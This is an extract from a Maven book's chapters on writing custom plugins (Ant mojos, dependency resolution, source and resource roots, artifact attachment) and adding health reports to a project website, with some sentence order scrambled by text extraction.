all of the mojo's parameter types are java. parameter injection takes place either through direct field assignment. and parameter flags such as required are still present. default value. Also. Fortunately. to develop an Ant-based mojo. its value is injected as a project reference. In this example. a more in-depth discussion of the metadata file for Ant mojos is available in Appendix A. expression.lang. by binding the mojo to the deploy phase of life cycle. The rule for parameter injection in Ant is as follows: if the parameter's type is java.or Beanshell-based mojos with no additional configuration. you will have to add support for Ant mojo extraction to the maven-plugin-plugin. you'd have to add a <type> element alongside the <name> element. Maven still must resolve and inject each of these parameters into the mojo. Any build that runs must be deployed for it to affect other development team members. Instead. Maven allows POM-specific injection of plugin-level dependencies in order to accommodate plugins that take a framework approach to providing their functionality. however.0 shipped without support for Ant-based mojos (support for Ant was added later in version 2. parameters are injected as properties and references into the Ant Project instance. some special configuration is required to allow the maven-plugin-plugin to recognize Ant mojos. mojo-level metadata describes details such as phase binding and mojo name. In an Antbased mojo however. otherwise.2).String (the default). First of all. the contents of this file may appear different than the metadata used in the Java mojo.Better Builds with Maven At first glance.0. 150 . each with its own information like name. in order to capture the parameter's type in the specification. As with the Java example. with its use of the MojoDescriptorExtractor interface from the maven-plugin-tools-api library. the overall structure of this file should be familiar. so it's pointless to spam the mailing list with notification e-mails every time a jar is created for the project. However. you will see many similarities. Finally. upon closer examination. the notification e-mails will be sent only when a new artifact becomes available in the remote repository. This allows developers to generate descriptors for Java.String. This library defines a set of interfaces for parsing mojo descriptors from their native format and generating various output from those descriptors – including plugin descriptor files. Modifying the plugin POM for Ant mojos Since Maven 2. In Java. but expressed in XML. The maven-plugin-plugin ships with the Java and Beanshell provider libraries which implement the above interface. since you now have a good concept of the types of metadata used to describe a mojo. notice that this mojo is bound to the deploy phase of the life cycle. If one of the parameters were some other object type. This is an important point in the case of this mojo. then its value is injected as a property. the difference here is the mechanism used for this injection.lang. because you're going to be sending e-mails to the development mailing list. metadata specify a list of parameters for the mojo. As with the Java example. The expression syntax used to extract information from the build state is exactly the same. and more. When this mojo is executed. or through JavaBeans-style setXXX() methods. The maven-plugin-plugin is a perfect example.
it will be quite difficult to execute an Ant-based plugin. The second new dependency is.5</version> </dependency> [.6.. 151 . the specifications of which should appear as follows: <dependencies> [.] </project> Additionally. since the plugin now contains an Ant-based mojo.apache. a dependency on the core Ant library (whose necessity should be obvious).apache.] <build> <plugins> <plugin> <artifactId>maven-plugin-plugin</artifactId> <dependencies> <dependency> <groupId>org.] </dependencies> The first of these new dependencies is the mojo API wrapper for Ant build scripts.maven</groupId> <artifactId>maven-plugin-tools-ant</artifactId> <version>2.2</version> </dependency> <dependency> <groupId>ant</groupId> <artifactId>ant</artifactId> <version>1..] <dependency> <groupId>org.0.2</version> </dependency> </dependencies> </plugin> </plugins> </build> [.. quite simply.maven</groupId> <artifactId>maven-script-ant</artifactId> <version>2... If you don't have Ant in the plugin classpath. you will need to add a dependency on the maven-plugin-tools-ant library to the maven-plugin-plugin using POM configuration as follows: <project> [.. and it is always necessary for embedding Ant scripts as mojos in the Maven build process. it requires a couple of new dependencies.0...Developing Custom Maven Plugins To accomplish this.
you should add a configuration section to the new execution section.] </plugins> </build> The existing <execution> section – the one that binds the extract mojo to the build – is not modified. 152 . Now. it behaves like any other type of mojo to Maven. Again.. and these two mojos should not execute in the same phase (as mentioned previously)..except in this case.] <plugins> <plugin> <artifactId>maven-buildinfo-plugin</artifactId> <executions> <execution> <id>extract</id> [. because non-deployed builds will have no effect on other team members. execute the following command: > mvn deploy The build process executes the steps required to build and deploy a jar . This is because an execution section can address only one phase of the build life cycle.Better Builds with Maven Binding the notify mojo to the life cycle Once the plugin descriptor is generated for the Ant mojo. which supplies the listAddr parameter value. Even its configuration is the same. Adding a life-cycle binding for the new Ant mojo in the Guinea Pig POM should appear as follows: <build> [. a new section for the notify mojo is created.] </execution> <execution> <id>notify</id> <goals> <goal>notify</goal> </goals> <configuration> <listAddr>dev@guineapig.. and send them to the Guinea Pig development mailing list in the deploy phase.... it will also extract the relevant environmental details during the package phase. notification happens in the deploy phase only.org</listAddr> </configuration> </execution> </executions> </plugin> [. In order to tell the notify mojo where to send this e-mail.codehaus. Instead.
Therefore.5. you must add a dependency on one or more Maven APIs to your project's POM.maven</groupId> <artifactId>maven-artifact-manager</artifactId> <version>2. project source code and resources. if you also need to work with artifacts – including actions like artifact resolution – you must also declare a dependency on maven-artifact-manager in your POM.1. and are not required for developing basic mojos. like this: <dependency> <groupId>org. one or more artifacts in the current build. The following sections do not build on one another. The next examples cover more advanced topics relating to mojo development. modify your POM to define a dependency on maven-artifact by adding the following: <dependency> <groupId>org. Whenever you need direct access to the current project instance. Gaining Access to Maven APIs Before proceeding.0</version> </dependency> It's important to realize that Maven's artifact APIs are slightly different from its project API. However.apache. in that the artifact-related interfaces are actually maintained in a separate artifact from the components used to work with them. including the ability to work with the current project instance. To enable access to Maven's project API.maven</groupId> <artifactId>maven-artifact</artifactId> <version>2. Advanced Mojo Development The preceding examples showed how to declare basic mojo parameters. if you only need to access information inside an artifact.apache. or any related components. However. it's important to mention that the techniques discussed in this section make use of Maven's project and artifact APIs. and artifact attachments.maven</groupId> <artifactId>maven-project</artifactId> <version>2. modify your POM to define a dependency on maven-project by adding the following: <dependency> <groupId>org. then read on! 5. if you want to know how to develop plugins that manage dependencies. the above dependency declaration is fine.Developing Custom Maven Plugins 5. and how to annotate the mojo with a name and a preferred phase binding.0</version> </dependency> 153 .5.apache.0</version> </dependency> To enable access to information in artifacts via Maven's artifact API.
this declaration has another annotation. To enable a mojo to work with the set of artifacts that comprise the project's dependencies. the mojo must tell Maven that it requires the project's dependencies be resolved (this second requirement is critical. As with all declarations. such as: -Ddependencies=[. you may be wondering. if the mojo works with a project's dependencies. Maven makes it easy to inject a project's dependencies.. In addition.. Accessing Project Dependencies Many mojos perform tasks that require access to a project's dependencies.] So. namely it disables configuration via the POM under the following section: <configuration> <dependencies>. This declaration should be familiar to you. only the following two changes are required: • First.</dependencies> </configuration> It also disables configuration via system properties. the mojo must tell Maven that it requires the project dependency set. the compile mojo in the maven-compiler-plugin must have a set of dependency paths in order to build the compilation classpath. This annotation tells Maven not to allow the user to configure this parameter directly.util. Injecting the project dependency set As described above..dependencies}" * @required * @readonly */ private java. • Second.Better Builds with Maven 5.2. since the dependency resolution process is what populates the set of artifacts that make up the project's dependencies). users could easily break their builds – particularly if the mojo in question compiled project source code. Fortunately. it must tell Maven that it requires access to that set of artifacts. this is specified via a mojo parameter definition and should use the following syntax: /** * The set of dependencies required by the project * @parameter default-value="${project. which might not be as familiar: @readonly. However. “How exactly can I configure this parameter?" The answer is that the mojos parameter value is derived from the dependencies section of the POM.5. For example.. so you configure this parameter by modifying that section directly. 154 .Set dependencies. If this parameter could be specified separately from the main dependencies section. since it defines a parameter with a default value that is required to be present before the mojo can execute. the test mojo in the maven-surefire-plugin requires the project's dependency paths so it can execute the project's unit tests with a proper classpath.
you'll know that one of its major problems is that it always resolves all project dependencies before invoking the first goal in the build (for clarity. Rather. your mojo must declare that it needs them. and if so. this is a direct result of the rigid dependency resolution design in Maven 1.0 uses the term 'mojo' as roughly equivalent to the Maven 1. it will force all of the dependencies to be resolved (test is the widest possible scope. If the project's dependencies aren't available. If you've used Maven 1. the clean process will fail – though not because the clean goal requires the project dependencies.Developing Custom Maven Plugins In this case. In other words. Maven will resolve only the dependencies that satisfy the requested scope. the @readonly annotation functions to force users to configure the POM. If a mojo doesn't need access to the dependency list. To gain access to the project's dependencies. direct configuration could result in a dependency being present for compilation. at which scope. if a mojo declares that it requires dependencies for the compile scope. Maven 2 will not resolve project dependencies until a mojo requires it. It's important to note that your mojo can require any valid dependency scope to be resolved prior to its execution.x term 'goal'). the mojo is missing one last important step. if your mojo needs to work with the project's dependencies. the build process doesn't incur the added overhead of resolving them. You can declare the requirement for the test-scoped project dependency set using the following class-level annotation: /** * @requiresDependencyResolution test [. any dependencies specific to the test scope will remain unresolved. Returning to the example. Even then.. the mojo should be ready to work with the dependency set. Requiring dependency resolution Having declared a parameter that injects the projects dependencies into the mojo.] */ Now. 155 . encapsulating all others). but being unavailable for testing.x. Therefore. However. Maven provides a mechanism that allows a mojo to specify whether it requires the project dependencies to be resolved. Failure to do so will cause an empty set to be injected into the mojo's dependencies parameter. Maven 2 addresses this problem by deferring dependency resolution until the project's dependencies are actually required. if later in the build process.x. it will have to tell Maven to resolve them.. Maven 2. rather than configuring a specific plugin only. Maven encounters another mojo that declares a requirement for test-scoped dependencies. Consider the case where a developer wants to clean the project directory using Maven 1.
To that end. rd. Once you have access to the project dependency set. one of the dependency libraries may have a newer snapshot version available.getArtifactId() ).getClassifier() != null ) { rd.hasNext().isOptional() ). you will need to iterate through the set. which enumerates all the dependencies used in the build. The code required is as follows: if ( dependencies != null && !dependencies.setClassifier( artifact. adding the information for each individual dependency to your buildinfo object.getVersion() ). rd.addResolvedDependency( rd ). In this case.setOptional( artifact. rd. knowing the specific set of snapshots used to compile a project can lend insights into why other builds are breaking. along with their versions – including those dependencies that are resolved transitively. you'll add the dependency-set injection code discussed previously to the extract mojo in the maven-buildinfo-plugin.setArtifactId( artifact. This will result in the addition of a new section in the buildinfo file. rd. ResolvedDependency rd = new ResolvedDependency(). } } 156 . } buildInfo.setType( artifact.Better Builds with Maven BuildInfo example: logging dependency versions Turning once again to the maven-buildinfo-plugin.setScope( artifact.iterator().getClassifier() ).setResolvedVersion( artifact. you will want to log the versions of the dependencies used during the build.getType() ). This is critical when the project depends on snapshot versions of other libraries. ) { Artifact artifact = (Artifact) it. rd. if ( artifact. For example.getGroupId() ).next(). so it can log the exact set of dependencies that were used to produce the project artifact.isEmpty() ) { for ( Iterator it = dependencies.getScope() ).setGroupId( artifact. rd. it.
the extract mojo should produce the same buildinfo file. For instance. This won't add much insight for debuggers looking for changes from build to build. or new source code directories to the build.mvnbook.0-alpha-SNAPSHOT. it may be necessary to augment a project's code base with an additional source directory. If this plugin adds resources like images.] <resolvedDependency> <groupId>com.. it's important for mojos to be able to access and manipulate both the source directory list and the resource definition list for a project. Therefore.1. This is because snapshot time-stamping happens on deployment only.8.1</resolvedVersion> <optional>false</optional> <type>jar</type> <scope>test</scope> </resolvedDependency> [.guineapig</groupId> <artifactId>guinea-pig-api</artifactId> <resolvedVersion>1. it's possible that a plugin may be introduced into the build process when a profile is activated. junit. and other mojos may need to produce reports based on those same source directories. Once this new source directory is in place.. when a project is built in a JDK 1. has a static version of 3. 157 .5. and is still listed with the version 1. If you were using a snapshot version from the local repository which has not been deployed. The actual snapshot version used for this artifact in a previous build could yield tremendous insight into the reasons for a current build failure.] </resolvedDependencies> The first dependency listed here. with an additional section called resolvedDependencies that looks similar to the following: <resolvedDependencies> <resolvedDependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <resolvedVersion>3. This dependency is part of the example development effort.8.094434-1</resolvedVersion> <optional>false</optional> <type>jar</type> <scope>compile</scope> </resolvedDependency> [.4 environment. it can have dramatic effects on the resulting project artifact. 5. Accessing Project Sources and Resources In certain cases.mergere.0-20060210.Developing Custom Maven Plugins When you re-build the plugin and re-run the Guinea Pig build. but consider the next dependency: guinea-pigapi. the resolvedVersion in the output above would be 1... particularly if the newest snapshot version is different. the compile mojo will require access to it.3.0-alpha-SNAPSHOT in the POM.
as in the following example: project. However. it's a simple matter of adding a new source root to it. Chapter 3 of this book). which tells Maven that it's OK to execute this mojo in the absence of a POM. It is possible that some builds won't have a current project. The current project instance is a great example of this. Maven's concept of a project can accommodate a whole list of directories. * @parameter default-value="${project}" * @required * @readonly */ private MavenProject project. As in the prior project dependencies discussion. unless declared otherwise. It requires access to the current MavenProject instance only. which can be injected into a mojo using the following code: /** * Project instance. Once the current project instance is available to the mojo. The generally-accepted binding for this type of activity is in the generate-sources life-cycle phase.directory}/generated-sources/<plugin-prefix> While conforming with location standards like this is not required. So. This declaration identifies the project field as a required mojo parameter that will inject the current MavenProject instance into the mojo for use. Maven will fail the build if it doesn't have a current project instance and it encounters a mojo that requires one. as in the case where the mavenarchetype-plugin is used to create a stub of a new project. or simply need to augment the basic project code base. and no other project contains current state information for this build. when generating source code. This can be very useful when plugins generate source code. Mojos that augment the source-root list need to ensure that they execute ahead of the compile phase. mojos require a current project instance to be available.addCompileSourceRoot( sourceDirectoryPath ). it does improve the chances that your mojo will be compatible with other plugins bound to the same life cycle. This annotation tells Maven that users cannot modify this parameter. Further. instead. any normal build will have a current project.build. if you expect your mojo to be used in a context where there is no POM – as in the case of the archetype plugin – then simply add the class-level annotation: @requiresProject with a value of false. it refers to a part of the build state that should always be present (a more in-depth discussion of this annotation is available in section 3.Better Builds with Maven Adding a source directory to the build Although the POM supports only a single sourceDirectory entry. this parameter also adds the @readonly annotation. the accepted default location for the generated source is in: ${project. 158 .6. used to add new source directory to the build. allowing plugins to add new source directories as they execute. Maven's project API bridges this gap.
xml files for servlet engines. the Maven application itself is well-hidden from the mojo developer.xml file found in all maven artifacts. Maven components can make it much simpler to interact with the build process. the process of adding a new resource directory to the current build is straightforward and requires access to the MavenProject and MavenProjectHelper: /** * Project instance. that it's not a parameter at all! In fact. * @component */ private MavenProjectHelper helper. used to add new source directory to the build. Normally. Many different mojo's package resources with their generated artifacts such as web. you should notice something very different about this parameter. Namely. it is a utility. or wsdl files for web services. 159 . It provides methods for attaching artifacts and adding new resource definitions to the current project. as in the case of Maven itself and the components. in some special cases. This could be a descriptor for binding the project artifact into an application framework. A complete discussion of Maven's architecture – and the components available – is beyond the scope of this chapter. this is what Maven calls a component requirement (it's a dependency on an internal component of the running Maven application). as it is particularly useful to mojo developers. used to make addition of resources * simpler. which means it's always present. the unadorned @component annotation – like the above code snippet – is adequate. the MavenProjectHelper component is worth mentioning here. the project helper is not a build state. * @parameter default-value="${project}" * @required * @readonly */ private MavenProject project. as discussed previously. the MavenProjectHelper is provided to standardize the process of augmenting the project instance. However. The project helper component can be injected as follows: /** * project-helper instance. in most cases. Right away. however. Component requirements are not available for configuration by users. so your mojo simply needs to ask for it.Developing Custom Maven Plugins Adding a resource to the build Another common practice is for a mojo to generate some sort of non-code resource. This declaration will inject the current project instance into the mojo. Whatever the purpose of the mojo. For example. To be clear. to simplify adding resources to a project. This component is part of the Maven application. Component requirements are simple to declare. the mojo also needs access to the MavenProjectHelper component. However. which will be packaged up in the same jar as the project classes. and abstract the associated complexities away from the mojo developer.
160 . the entire build will fail. The classic example is the compile mojo in the maven-compiler-plugin. as in the following example: /** * List of source roots containing non-test code. they have to modify the sourceDirectory element in the POM. and the jar mojo in the maven-source-plugin. List excludes = null. it's important to understand where resources should be added during the build life cycle. in order to perform some operation on the source code. and exclusion patterns as local variables. this parameter declaration states that Maven does not allow users to configure this parameter directly.compileSourceRoots}" * @required * @readonly */ private List sourceRoots. includes. directory. Again. The parameter is also required for this mojo to execute. The most common place for such activities is in the generate-resources life-cycle phase.addResource(project. List includes = Collections. which actually compiles the source code contained in these root directories into classes in the project output directory. In a typical case. it will need to execute ahead of this phase. others must read the list of active source directories.Better Builds with Maven With these two objects at your disposal. Other examples include javadoc mojo in the maven-javadoc-plugin. excludes). Similar to the parameter declarations from previous sections. which may or may not be directly configurable. If your mojo is meant to add resources to the eventual project artifact. adding a new resource couldn't be easier. Simply define the resources directory to add. conforming with these standards improves the compatibility of your plugin with other plugins in the build. Accessing the source-root list Just as some mojos add new source directories to the build. along with inclusion and exclusion patterns for resources within that directory. * @parameter default-value="${project. and then call a utility method on the project helper. all you have to do is declare a single parameter to inject them. these values would come from other mojo parameters. for the sake of brevity.singletonList("**/*"). The prior example instantiates the resource's directory. instead. Gaining access to the list of source root directories for a project is easy. or else bind a mojo to the life-cycle phase that will add an additional source directory to the build. Again. inclusion patterns. The code should look similar to the following: String directory = "relative/path/to/some/directory". if it's missing. helper. Resources are copied to the classes directory of the build during the process-resources phase.
as in the case of the extract mojo. You've already learned that mojos can modify the list of resources included in the project artifact. you need to add the following code: for ( Iterator it = sourceRoots. Accessing the resource list Non-code resources complete the picture of the raw materials processed by a Maven build. in order to incorporate list of source directories to the buildinfo object. for eventual debugging purposes. If a certain profile injects a supplemental source directory into the build (most likely by way of a special mojo binding).. buildInfo. which copies all non-code resources to the output directory for inclusion in the project artifact. binding this mojo to an early phase of the life cycle increases the risk of another mojo adding a new source root in a later phase. it's better to bind it to a later phase like package if capturing a complete picture of the project is important. In this case however.next(). } One thing to note about this code snippet is the makeRelative() method. now. the ${basedir} expression refers to the location of the project directory in the local file system.hasNext(). then this profile would dramatically alter the resulting project artifact when activated. binding to any phase later than compile should be acceptable. let's learn about how a mojo can access the list of resources used in a build. it. source roots are expressed as absolute file-system paths. since compile is the phase where source files are converted into classes. 161 . any reference to the path of the project directory in the local file system should be removed. it could be critically important to track the list of source directories used in a particular build. When you add this code to the extract mojo in the maven-buildinfo-plugin. ) { String sourceRoot = (String) it. However. By the time the mojo gains access to them. Returning to the buildinfo example.iterator(). To be clear. This is the mechanism used by the resources mojo in the maven-resources-plugin. applying whatever processing is necessary. Therefore.addSourceRoot( makeRelative( sourceRoot ) ). it can iterate through them. it can be bound to any phase in the life cycle. Remember. This involves subtracting ${basedir} from the source-root paths.Developing Custom Maven Plugins Now that the mojo has access to the list of project source roots. In order to make this information more generally applicable.
it is important that the buildinfo file capture the resource root directories used in the build for future reference. the user has the option of modifying the value of the list by configuring the resources section of the POM. 162 .model.resources}" * @required * @readonly */ private List resources. along with some matching rules for the resource files it contains. it can mean the difference between an artifact that can be deployed into a server environment and an artifact that cannot.List.maven. } } As with the prior source-root example. capturing the list of resources used to produce a project artifact can yield information that is vital for debugging purposes.iterator(). you'll notice the makeRelative() method. and Maven mojos must be able to execute in a JDK 1. Therefore. containing * directory. and excludes. The parameter appears as follows: /** * List of Resource objects for the current build.isEmpty() ) { for ( Iterator it = resources. includes. since the ${basedir} path won't have meaning outside the context of the local file system. All POM paths injected into mojos are converted to their absolute form first.addResourceRoot( makeRelative( resourceRoot ) ). String resourceRoot = resource. this parameter is declared as required for mojo execution and cannot be edited by the user. if an activated profile introduces a mojo that generates some sort of supplemental framework descriptor. by trimming the ${basedir} prefix. Since the resources list is an instance of java.next(). ) { Resource resource = (Resource) it.getDirectory(). allowing direct configuration of this parameter could easily produce results that are inconsistent with other resource-consuming mojos. the resources list is easy to inject as a mojo parameter.util. mojos must be smart enough to cast list elements as org.Better Builds with Maven Much like the source-root list. It's necessary to revert resource directories to relative locations for the purposes of the buildinfo plugin. For instance. which in fact contain information about a resource root. It's a simple task to add this capability. This method converts the absolute path of the resource directory into a relative path. * @parameter default-value="${project. to avoid any ambiguity.apache. It's also important to note that this list consists of Resource objects.hasNext(). and can be accomplished through the following code snippet: if ( resources != null && !resources. it. As noted before with the dependencies parameter. Since mojos can add new resources to the build programmatically. Just like the source-root injection parameter.Resource instances. In this case. buildInfo.4 environment that doesn't support Java generics.
Usually. Attaching Artifacts for Installation and Deployment Occasionally. the key differences are summarized in the table below. Like the vast majority of activities.addTestSourceRoot() ${project.4.addCompileSourceRoot() ${project. This chapter does not discuss test-time and compile-time source roots and resources as separate topics. That section should appear as follows: <resourceRoots> <resourceRoot>src/main/resources</resourceRoot> <resourceRoot>target/generated-resources/xdoclet</resourceRoot> </resourceRoots> Once more. by using the classifier element for that dependency section within the POM. Maven treats these derivative artifacts as attachments to the main project artifact. only the parameter expressions and method names are different. The concepts are the same. Note on testing source-roots and resources All of the examples in this advanced development discussion have focused on the handling of source code and resources.Developing Custom Maven Plugins Adding this code snippet to the extract mojo in the maven-buildinfo-plugin will result in a resourceRoots section being added to the buildinfo file.addTestResource() ${project. which may be executed during the build process. It's important to note however. 163 . due to the similarities. These artifacts are typically a derivative action or side effect of the main build process. a corresponding activity can be written to work with their test-time counterparts. collecting the list of project resources has an appropriate place in the life cycle.resources} project. javadoc bundles. mojos produce new artifacts that should be distributed alongside the main project artifact in the Maven repository system. Since all project resources are collected and copied to the project output directory in the processresources phase. which sets it apart from the main project artifact in the repository. Therefore. an artifact attachment will have a classifier. that for every activity examined that relates to source-root directories or resource definitions. instead. in that they are never distributed without the project artifact being distributed. any mojo seeking to catalog the resources used in the build should execute at least as late as the process-resources phase.testResources} 5.addResource() ${project. Once an artifact attachment is deposited in the Maven repository. and even the buildinfo file produced in the examples throughout this chapter. Table 5-2: Key differences between compile-time and test-time mojo activities Activity Change This To This Add testing source root Get testing source roots Add testing resource Get testing resources project. Classic examples of attached artifacts are source archives. This ensures that any resource modifications introduced by mojos in the build process have been completed. it's worthwhile to discuss the proper place for this type of activity within the build life cycle. it can be referenced like any other artifact. this classifier must also be specified when declaring the dependency for such an artifact. which must be processed and included in the final project artifact.testSourceRoots} helper.5.compileSourceRoots} helper. like sources or javadoc.
produces a derivative artifact. From the prior examples. "xml". * @parameter default-value="${project}" * @required * @readonly */ private MavenProject project. which will make the process of attaching the buildinfo artifact a little easier: /** * This helper class makes adding an artifact attachment simpler.Better Builds with Maven When a mojo. or set of mojos. "buildinfo". since it provides information about how each snapshot of the project came into existence.attachArtifact( project. the meaning and requirement of project and outputFile references should be clear. an extra piece of code must be executed in order to attach that artifact to the project artifact. outputFile ). which is still missing from the maven-buildinfo-plugin example. These values represent the artifact extension and classifier. This extra step. Once you include these two fields in the extract mojo within the maven-buildinfo-plugin. For convenience you should also inject the following reference to MavenProjectHelper. Doing so guarantees that attachment will be distributed when the install or deploy phases are run. you'll need a parameter that references the current project instance as follows: /** * Project instance. * @component */ private MavenProjectHelper helper. While an e-mail describing the build environment is transient. for historical reference.5. However. See Section 5. The MavenProject instance is the object with which your plugin will register the attachment with for use in later phases of the lifecycle. respectively. Including an artifact attachment involves adding two parameters and one line of code to your mojo. and only serves to describe the latest build. 164 .2 for a discussion about MavenProjectHelper and component requirements. the distribution of the buildinfo file via Maven's repository will provide a more permanent record of the build for each snapshot in the repository. to which we want to add an attached artifact. can provide valuable information to the development team. there are also two somewhat cryptic string values being passed in: “xml” and “buildinfo”. First. the process of attaching the generated buildinfo file to the main project artifact can be accomplished by adding the following code snippet: helper.
the maven-buildinfo-plugin is ready for action. In this chapter. you've also learned how a plugin generated file can be distributed alongside the project artifact in Maven's repository system. Summary In its unadorned state.pom Now. it can attach the buildinfo file to the main project artifact so that it's distributed whenever Maven installs or deploys the project. Maven can integrate these custom tasks into the build process through its extensible plugin framework. you can test it by re-building the plugin. Whether they be code-generation. enabling you to attach custom artifacts for installation or deployment. Using the default lifecycle mapping. It can extract relevant details from a running build and generate a buildinfo file based on these details.Developing Custom Maven Plugins By specifying an extension of “xml”. the maven-buildinfo-plugin can also generate an e-mail that contains the buildinfo file contents. 5.xml guinea-pig-core-1. then running Maven to the install life-cycle phase on our test project. Finally. Now that you've added code to distribute the buildinfo file.xml extension.0-SNAPSHOT dir guinea-pig-core-1.0-SNAPSHOT-buildinfo. This serves to attach meaning beyond simply saying. in certain circumstances. Since the build process for a project is defined by the plugins – or more accurately. reporting. you've learned that it's relatively simple to create a mojo that can extract relevant parts of the build state in order to perform a custom build-process task – even to the point of altering the set of source-code directories used to build the project.jar guinea-pig-core-1. you're telling Maven that the file in the repository should be named using a. From there. there is a standardized way to inject new behavior into the build by binding new mojos at different life-cycle phases. you should see the buildinfo file appear in the local repository alongside the project jar. 165 . Finally.6. a project requires special tasks in order to build successfully. and route that message to other development team members on the project development mailing list.0-SNAPSHOT. the mojos – that are bound to the build life cycle. when the project is deployed. Working with project dependencies and resources is equally as simple. Maven represents an implementation of the 80/20 rule.0-SNAPSHOT. By specifying the “buildinfo” classifier. or verification steps. “This is an XML file”. as follows: > > > > mvn install cd C:\Documents and Settings\jdcasey\. Maven can build a basic project with little or no modification – thus covering the 80% case. However. If you build the Guinea Pig project using this modified version of the maven-buildinfo-plugin. It identifies the file as being produced by the the maven-buildinfoplugin. you're telling Maven that this artifact should be distinguished from other project artifacts by using this value in the classifier element of the dependency declaration. as opposed to another plugin in the build process which might produce another XML file with different meaning.m2\repository cd com\mergere\mvnbook\guineapig\guinea-pig-core\1.
you can integrate almost any tool into the build process. it's unlikely to be a requirement unique to your project. 166 . if you have the means. It is in great part due to the re-usable nature of its plugins that Maven can offer such a powerful build platform. only a tiny fraction of which are a part of the default lifecycle mapping. or the project web site of the tools with which your project's build must integrate. So. remember that whatever problem your custom-developed plugin solves. If not. If your project requires special handling. please consider contributing back to the Maven community by providing access to your new plugin. Mojo development can be as simple or as complex (to the point of embedding nested Maven processes within the build) as you need it to be. Using the plugin mechanisms described in this chapter.Better Builds with Maven Many plugins already exist for Maven use. However. the Codehaus Mojo project. developing a custom Maven plugin is an easy next step. chances are good that you can find a plugin to address this need at the Apache Maven project.
it is an art.6.Samuel Butler 167 .. .
Because the POM is a declarative model of the project. the project will meet only the lowest standard and go no further. When referring to health. It provides additional information to help determine the reasons for a failed build. Maven can analyze. how well it is tested. This is unproductive as minor changes are prioritized over more important tasks. and how well it adapts to change. unzip the Code_Ch06-1. new tools that can assess its health are easily integrated. To begin. In this chapter. For this reason. In this chapter. It is important not to get carried away with setting up a fancy Web site full of reports that nobody will ever use (especially when reports contain failures they don't want to know about!). which everyone can see at any time. because if the bar is set too high. why have a site. But. What Does Maven Have to do With Project Health? In the introduction. Project vitality . It is these characteristics that assist you in assessing the health of your project.zip for convenience as a starting point. many of the reports illustrated can be run as part of the regular build in the form of a “check” that will fail the build if a certain condition is not met. if the build fails its checks? The Web site also provides a permanent record of a project's health. there are two aspects to consider: • Code quality .zip file into C:\mvnbook or your selected working directory. and what the nature of that activity is. and whether the conditions for the checks are set correctly. and display that information in a single place. This is important. you'll learn how to use a number of these tools effectively. • Maven takes all of the information you need to know about your project and brings it together under the project Web site. and using a variety of tools. 168 . The code that concluded Chapter 3 is also included in Code_Ch06-1.finding out whether there is any activity on the project. and learning more about the health of the project.1. it was pointed out that Maven's application of patterns provides visibility and comprehensibility. Conversely.Better Builds with Maven 6.determining how well the code works. Maven has access to the information that makes up a project. Through the POM. if the bar is set too low. to get a build to pass. relate. and then run mvn install from the proficio subdirectory to ensure everything is in place. The next three sections demonstrate how to set up an effective project Web site. you will be revisiting the Proficio application that was developed in Chapter 3. there will be too many failed builds.
Figure 6-1: The reports generated by Maven You can see that the navigation on the left contains a number of reports. The Project Info menu lists the standard reports Maven includes with your site by default. For newcomers to the project. and now shows how to integrate project health information.xml: 169 .Assessing Project Health with Maven 6. unless you choose to disable them. On a new project. Project Reports. by including the following section in proficio/pom. The second menu (shown opened in figure 6-1). adding a new report is easy. is the focus of the rest of this chapter. having these standard reports means that those familiar with Maven Web sites will always know where to find the information they need. These reports provide a variety of insights into the quality and vitality of the project.2. Adding Reports to the Project Web site This section builds on the information on project Web sites in Chapter 2 and Chapter 3. For example. and to reference as links in your mailing lists. To start. However. These reports are useful for sharing information with others. issue tracker. and so on. review the project Web site shown in figure 6-1. SCM. you can add the Surefire report to the sample application. this menu doesn't appear as there are no reports included.
</project> This adds the report to the top level project. and is shown in figure 6-2. and as a result.apache. <reporting> <plugins> <plugin> <groupId>org. You can now run the following site task in the proficio-core directory to regenerate the site.maven. it will be inherited by all of the child modules.plugins</groupId> <artifactId>maven-surefire-report-plugin</artifactId> </plugin> </plugins> </reporting> .. Figure 6-2: The Surefire report 170 ..Better Builds with Maven .. C:\mvnbook\proficio\proficio-core> mvn site This can now be found in the file target/site/surefire-report..html.
. Configuration of Reports Before stepping any further into using the project Web site.. Configuration for a reporting plugin is very similar. Maven knows where the tests and test results are.. 171 . the report can be modified to only show test failures by adding the following configuration in pom..Assessing Project Health with Maven As you may have noticed in the summary.maven.. 6.3. the defaults are sufficient to get started with a useful report.plugins</groupId> <artifactId>maven-surefire-report-plugin</artifactId> <configuration> <showSuccess>false</showSuccess> </configuration> </plugin> </plugins> </reporting> . <build> <plugins> <plugin> <groupId>org. it is important to understand how the report configuration is handled in Maven. For example.. For a quicker turn around.5</target> </configuration> </plugin> </plugins> </build> . however it is added to the reporting section of the POM.xml.. <reporting> <plugins> <plugin> <groupId>org. You might recall from Chapter 2 that a plugin is configured using the configuration element inside the plugin declaration in pom..xml: . and due to using convention over configuration.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <source>1.apache.maven. for example: .apache. the report shows the test results of the project..5</source> <target>1.
consider if you wanted to create a copy of the HTML report in the directory target/surefirereports every time the build ran. “Executions” such as this were introduced in Chapter 3.. <build> <plugins> <plugin> <groupId>org.build.directory}/surefire-reports </outputDirectory> </configuration> <executions> <execution> <phase>test</phase> <goals> <goal>report</goal> </goals> </execution> </executions> </plugin> </plugins> </build> . However.plugins</groupId> <artifactId>maven-surefire-report-plugin</artifactId> <configuration> <outputDirectory> ${project. is used only during the build.. The plugin is included in the build section to ensure that the configuration. even though it is not specific to the execution. as seen in the previous section. To do this. However. they will all be included. you might think that you'd need to configure the parameter in both sections. or in addition to. the reporting section: . If a plugin contains multiple reports.. some reports apply to both the site.Better Builds with Maven The addition of the plugin element triggers the inclusion of the report in the Web site. the plugin would need to be configured in the build section instead of. Fortunately. what if the location of the Surefire XML reports that are used as input (and would be configured using the reportsDirectory parameter) were different to the default location? Initially.. Any plugin configuration declared in the reporting section is also applied to those declared in the build section. and not site generation. while the configuration can be used to modify its appearance or behavior. Plugins and their associated configuration that are declared in the build section are not used during site generation. this isn't the case – adding the configuration to the reporting section is sufficient. and the build.apache. To continue with the Surefire report. 172 .maven.
